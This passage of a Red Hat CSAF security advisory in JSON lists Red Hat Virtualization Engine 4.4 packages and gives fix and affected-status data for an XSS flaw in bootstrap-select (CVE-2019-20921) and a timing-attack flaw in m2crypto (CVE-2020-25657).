"name": "ovirt-engine-dwh-0:4.4.5.5-1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.noarch"
},
"product_reference": "ovirt-engine-dwh-0:4.4.5.5-1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-dwh-0:4.4.5.5-1.el8ev.src as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.src"
},
"product_reference": "ovirt-engine-dwh-0:4.4.5.5-1.el8ev.src",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-dwh-grafana-integration-setup-0:4.4.5.5-1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-dwh-grafana-integration-setup-0:4.4.5.5-1.el8ev.noarch"
},
"product_reference": "ovirt-engine-dwh-grafana-integration-setup-0:4.4.5.5-1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-dwh-setup-0:4.4.5.5-1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-dwh-setup-0:4.4.5.5-1.el8ev.noarch"
},
"product_reference": "ovirt-engine-dwh-setup-0:4.4.5.5-1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-health-check-bundler-0:4.4.5.9-0.1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-health-check-bundler-0:4.4.5.9-0.1.el8ev.noarch"
},
"product_reference": "ovirt-engine-health-check-bundler-0:4.4.5.9-0.1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-restapi-0:4.4.5.9-0.1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-restapi-0:4.4.5.9-0.1.el8ev.noarch"
},
"product_reference": "ovirt-engine-restapi-0:4.4.5.9-0.1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-setup-0:4.4.5.9-0.1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-setup-0:4.4.5.9-0.1.el8ev.noarch"
},
"product_reference": "ovirt-engine-setup-0:4.4.5.9-0.1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-setup-base-0:4.4.5.9-0.1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-setup-base-0:4.4.5.9-0.1.el8ev.noarch"
},
"product_reference": "ovirt-engine-setup-base-0:4.4.5.9-0.1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-setup-plugin-cinderlib-0:4.4.5.9-0.1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-setup-plugin-cinderlib-0:4.4.5.9-0.1.el8ev.noarch"
},
"product_reference": "ovirt-engine-setup-plugin-cinderlib-0:4.4.5.9-0.1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-setup-plugin-imageio-0:4.4.5.9-0.1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-setup-plugin-imageio-0:4.4.5.9-0.1.el8ev.noarch"
},
"product_reference": "ovirt-engine-setup-plugin-imageio-0:4.4.5.9-0.1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-setup-plugin-ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch"
},
"product_reference": "ovirt-engine-setup-plugin-ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-setup-plugin-ovirt-engine-common-0:4.4.5.9-0.1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-common-0:4.4.5.9-0.1.el8ev.noarch"
},
"product_reference": "ovirt-engine-setup-plugin-ovirt-engine-common-0:4.4.5.9-0.1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-setup-plugin-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-setup-plugin-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch"
},
"product_reference": "ovirt-engine-setup-plugin-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-setup-plugin-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-setup-plugin-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch"
},
"product_reference": "ovirt-engine-setup-plugin-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-tools-0:4.4.5.9-0.1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-tools-0:4.4.5.9-0.1.el8ev.noarch"
},
"product_reference": "ovirt-engine-tools-0:4.4.5.9-0.1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-tools-backup-0:4.4.5.9-0.1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-tools-backup-0:4.4.5.9-0.1.el8ev.noarch"
},
"product_reference": "ovirt-engine-tools-backup-0:4.4.5.9-0.1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch"
},
"product_reference": "ovirt-engine-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-webadmin-portal-0:4.4.5.9-0.1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-webadmin-portal-0:4.4.5.9-0.1.el8ev.noarch"
},
"product_reference": "ovirt-engine-webadmin-portal-0:4.4.5.9-0.1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch"
},
"product_reference": "ovirt-engine-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-web-ui-0:1.6.7-1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.noarch"
},
"product_reference": "ovirt-web-ui-0:1.6.7-1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-web-ui-0:1.6.7-1.el8ev.src as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.src"
},
"product_reference": "ovirt-web-ui-0:1.6.7-1.el8ev.src",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-ansible-runner-0:1.4.6-2.el8ar.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:python3-ansible-runner-0:1.4.6-2.el8ar.noarch"
},
"product_reference": "python3-ansible-runner-0:1.4.6-2.el8ar.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-ovirt-engine-lib-0:4.4.5.9-0.1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:python3-ovirt-engine-lib-0:4.4.5.9-0.1.el8ev.noarch"
},
"product_reference": "python3-ovirt-engine-lib-0:4.4.5.9-0.1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rhvm-0:4.4.5.9-0.1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:rhvm-0:4.4.5.9-0.1.el8ev.noarch"
},
"product_reference": "rhvm-0:4.4.5.9-0.1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2019-20921",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2020-09-24T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.noarch",
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.src",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-javadoc-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-backend-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dbscripts-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-dwh-grafana-integration-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-health-check-bundler-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-restapi-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-base-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-cinderlib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-imageio-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-common-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-backup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-webadmin-portal-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:python3-ansible-runner-0:1.4.6-2.el8ar.noarch",
"8Base-RHV-S-4.4:python3-ovirt-engine-lib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:rhvm-0:4.4.5.9-0.1.el8ev.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1882273"
}
],
"notes": [
{
"category": "description",
"text": "bootstrap-select before 1.13.6 allows Cross-Site Scripting (XSS). It does not escape title values in OPTION elements. This may allow attackers to execute arbitrary JavaScript in a victim\u0027s browser.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "nodejs-bootstrap-select: not escaping title values on \u003coption\u003e may lead to XSS",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "In OpenShift Service Mesh (OSSM) the openshift-service-mesh/kiali-rhel7 container (which installs the kiali rpm) is behind OpenShift OAuth authentication restricting access to the vulnerable bootstrap-select library to authenticated users only, therefore the impact is low.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.src"
],
"known_not_affected": [
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.noarch",
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.src",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-javadoc-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-backend-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dbscripts-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-dwh-grafana-integration-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-health-check-bundler-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-restapi-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-base-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-cinderlib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-imageio-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-common-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-backup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-webadmin-portal-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:python3-ansible-runner-0:1.4.6-2.el8ar.noarch",
"8Base-RHV-S-4.4:python3-ovirt-engine-lib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:rhvm-0:4.4.5.9-0.1.el8ev.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2019-20921"
},
{
"category": "external",
"summary": "RHBZ#1882273",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1882273"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2019-20921",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-20921"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2019-20921",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-20921"
},
{
"category": "external",
"summary": "https://github.com/advisories/GHSA-9r7h-6639-v5mw",
"url": "https://github.com/advisories/GHSA-9r7h-6639-v5mw"
},
{
"category": "external",
"summary": "https://snyk.io/vuln/SNYK-JS-BOOTSTRAPSELECT-570457",
"url": "https://snyk.io/vuln/SNYK-JS-BOOTSTRAPSELECT-570457"
}
],
"release_date": "2019-02-14T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-04-14T16:34:39+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/2974891",
"product_ids": [
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.src"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:1169"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.noarch",
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.src",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-javadoc-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-backend-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dbscripts-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-dwh-grafana-integration-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-health-check-bundler-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-restapi-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-base-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-cinderlib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-imageio-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-common-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-backup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-webadmin-portal-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.src",
"8Base-RHV-S-4.4:python3-ansible-runner-0:1.4.6-2.el8ar.noarch",
"8Base-RHV-S-4.4:python3-ovirt-engine-lib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:rhvm-0:4.4.5.9-0.1.el8ev.noarch"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "nodejs-bootstrap-select: not escaping title values on \u003coption\u003e may lead to XSS"
},
{
"cve": "CVE-2020-25657",
"cwe": {
"id": "CWE-203",
"name": "Observable Discrepancy"
},
"discovery_date": "2020-10-19T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.noarch",
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.src",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-javadoc-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-dwh-grafana-integration-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.src",
"8Base-RHV-S-4.4:python3-ansible-runner-0:1.4.6-2.el8ar.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1889823"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in all released versions of m2crypto, where they are vulnerable to Bleichenbacher timing attacks in the RSA decryption API via the timed processing of valid PKCS#1 v1.5 Ciphertext. The highest threat from this vulnerability is to confidentiality.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "m2crypto: bleichenbacher timing attacks in the RSA decryption API",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-backend-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dbscripts-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-health-check-bundler-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-restapi-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-base-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-cinderlib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-imageio-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-common-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-backup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-webadmin-portal-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:python3-ovirt-engine-lib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:rhvm-0:4.4.5.9-0.1.el8ev.noarch"
],
"known_not_affected": [
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.noarch",
